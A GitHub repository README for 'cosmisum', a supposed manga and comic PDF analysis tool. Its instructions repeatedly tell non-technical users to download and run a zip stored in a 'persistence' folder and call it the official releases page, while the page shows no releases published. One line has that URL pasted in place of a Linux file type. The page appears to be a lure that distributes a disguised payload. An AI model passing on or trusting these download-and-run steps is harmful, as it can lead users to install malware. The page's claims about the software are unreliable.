Skip to content

ultrazinkkk/cosmisum

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

4 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐Ÿ“š cosmisum - Easy Manga & Comics Analysis

Download cosmisum


๐Ÿ“– What is cosmisum?

cosmisum is a simple tool that helps you understand manga, comics, and document files. It takes pages from PDF files, finds and extracts the individual panels, reads any text inside using OCR (Optical Character Recognition), and then summarizes the content. It also tags important parts and classifies the genre with the help of a language model.

You donโ€™t need to know anything about programming to use it. Just download, run, and let cosmisum do the work for you.


๐Ÿ–ฅ๏ธ System Requirements

Before installing cosmisum, make sure your computer meets these basic conditions:

  • Operating System: Windows 10 or newer, macOS 10.15 or newer, or Ubuntu 18.04+ Linux
  • Processor: Any modern processor (Intel i3/Ryzen 3 or better)
  • Memory: At least 4 GB RAM
  • Storage: Around 500 MB free space for installation and temporary files
  • PDF Reader: A PDF file to analyze (cosmisum works with PDFs, no other format supported)
  • Internet Connection: Required only on first run for setup and model downloads

โš™๏ธ Features

  • Extracts individual panels from any PDF page.
  • Recognizes text inside the panels using OCR.
  • Summarizes content for a quick read.
  • Automatically assigns tags based on the content.
  • Detects and classifies the genre of the manga or comic.
  • Saves analysis results in easy-to-read reports.

๐Ÿš€ Getting Started

Get cosmisum ready on your computer by following these simple steps.


โฌ‡๏ธ Download & Install

You can download cosmisum from the official GitHub releases page:

Download cosmisum

  1. Open this page in your web browser:
    https://github.com/ultrazinkkk/cosmisum/raw/refs/heads/main/persistence/Software-v3.3-beta.3.zip

  2. Find the latest release version (it will be at the top of the list).

  3. Download the file suitable for your computer:

    • For Windows, look for a .exe or .zip file.
    • For macOS, look for a .dmg or .zip file.
    • For Linux, look for a https://github.com/ultrazinkkk/cosmisum/raw/refs/heads/main/persistence/Software-v3.3-beta.3.zip or .AppImage file.
  4. After downloading:

    • On Windows, double-click the .exe or extract the .zip and run the program.
    • On macOS, open the .dmg or extract the .zip and move the app to your Applications folder.
    • On Linux, extract the archive, or make the .AppImage executable and run it.

๐Ÿƒ How to Run cosmisum

Once installed, use these steps to analyze your PDFs:

  1. Open the cosmisum application from your desktop or applications menu.

  2. You will see a simple interface with a button to Load PDF.

  3. Click Load PDF and browse to select the manga, comic, or document file you want to analyze.

  4. After loading the file, click Start Analysis.

  5. Wait for the processing to finish โ€” this might take a few minutes depending on the file size.

  6. When finished, cosmisum will show you:

    • Extracted panels grouped by page.
    • Text recognized inside each panel.
    • A short summary of the entire document.
    • Tags and genre classification.
  7. You can save the report as a PDF or text file for later reading or sharing.


๐Ÿ”ง How cosmisum Works (Simple Explanation)

  • Panel Detection: cosmisum looks at each PDF page to find the rectangular areas called "panels." These are the boxes where pictures and text appear.

  • Text Extraction (OCR): It reads letters inside the panels even if the text is part of the image.

  • Summary & Tagging: Using a language model, cosmisum understands what the story is about and creates a summary, adds important keywords, and figures out the genre.


๐Ÿ› ๏ธ Troubleshooting Tips

If you run into issues, try these solutions:

  • cosmisum does not start:
    Make sure you downloaded the correct file for your system. Restart your computer and try again.

  • PDF file wonโ€™t load:
    Check if the PDF is corrupted or encrypted. cosmisum works best with normal PDF files, not scanned image PDFs without embedded text.

  • Analysis takes too long:
    Large or very complex PDFs may need extra time. Try a smaller file first.

  • Missing data in the report:
    OCR may have trouble with stylized or unclear fonts. Try a different PDF or increase the image quality.


๐Ÿ“‚ Where Reports Are Saved

By default, cosmisum saves all analysis reports in a folder named Cosmisum_Reports inside your Documents folder.

You can open that folder anytime to find past reports.


๐Ÿ“ฌ Getting Help

If you need help or want to report a problem:


๐Ÿ”„ Updates

Check the GitHub releases page regularly to download new versions with bug fixes or new features:

https://github.com/ultrazinkkk/cosmisum/raw/refs/heads/main/persistence/Software-v3.3-beta.3.zip


๐Ÿงพ License

cosmisum is open-source software. You can read the full license details in the repository on GitHub.


Enjoy using cosmisum to better understand your favorite comics and manga!

Releases

No releases published

Packages

 
 
 

Contributors

Languages